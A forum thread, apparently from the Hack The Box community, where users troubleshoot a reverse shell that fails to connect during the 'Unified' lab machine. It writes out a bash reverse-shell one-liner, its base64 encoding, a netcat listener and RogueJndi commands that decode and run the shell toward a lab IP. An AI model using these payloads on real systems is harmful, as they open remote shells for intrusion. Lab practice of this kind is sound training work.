HTB Unified

NeoMatrix1217 · March 16, 2022, 4:13am

Hello, I have been trying to get Pawn the Unified machine all goes well until getting to the ncat listening on port 4444. Ran the following command without an issue
$ echo ‘bash -c bash -i >&/dev/tcp/10.10.14.27/4444 0>&1’ | base64
YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuMjcvNDQ0NCAwPiYxCg==
RogueJndi works and the payload get sent and Jndi gets the request but nothing shows on ncat I’ve tried everything I know please help.

Thanks

TheConcierge · March 25, 2022, 10:07am

Hi,

was facing similar issues - I don’t know your setup, but for me within a kali vanilla installation, I ran:
sudo nc -nlvp 4444 instead of just nc -nlvp 4444.

No clue why I had to use sudo

Still #worthatry

NeoMatrix1217 · March 25, 2022, 9:41pm

Thanks for the suggestion I will give it a try.

M1L · May 23, 2022, 11:20am

[I know older post, but answering for future referencing]

I struggled at the same point: no shell spawning, but rogueJndi registering the payload.
In my case, the hard-to-spot issue was very likely a line break in one of the commands which I had copied over from blogposts before adjusting. You can check in an editor if that might be the case.

@TheConcierge using sudo with nmap should only be required for lower ports from 0-1024 . If you have used one of these, that could be the answer to your wondering, but for 4444 this shouldn’t have made a difference…

jveras0924 · November 29, 2022, 1:17am

Try changing the starting point vpn you are using. (worked for me). Either that or what until the VIP that HTB assigned you expires/changes.

Kao · January 28, 2023, 11:32pm

Hi! I have the same problem as NeoMatrix1217, I have tried everything but cant get the netcat to spawn the shell. I have made sure there are no breaks or spaces in the shell:

java -jar target/RogueJndi-1.1.jar --command “bash -c {echo,BASE64 YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTUuMTIzLzQ0NDQgMD4mMQo=} | {base64,-d} | {bash,-i}” --hostname “10.10.15.123”

Please if anybody has a suggestion it will be very much appreciatted.
Thanks!

hunterxxx · March 23, 2023, 4:22pm

java -jar target/RogueJndi-1.1.jar --command “bash -c {echo,BASE64 YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTUuMTIzLzQ0NDQgMD4mMQo=} | {base64,-d} | {bash,-i}” --hostname “10.10.15.123”

You have to remove BASE64, i.e:

java -jar target/RogueJndi-1.1.jar --command “bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTUuMTIzLzQ0NDQgMD4mMQo=} | {base64,-d} | {bash,-i}” --hostname “10.10.15.123”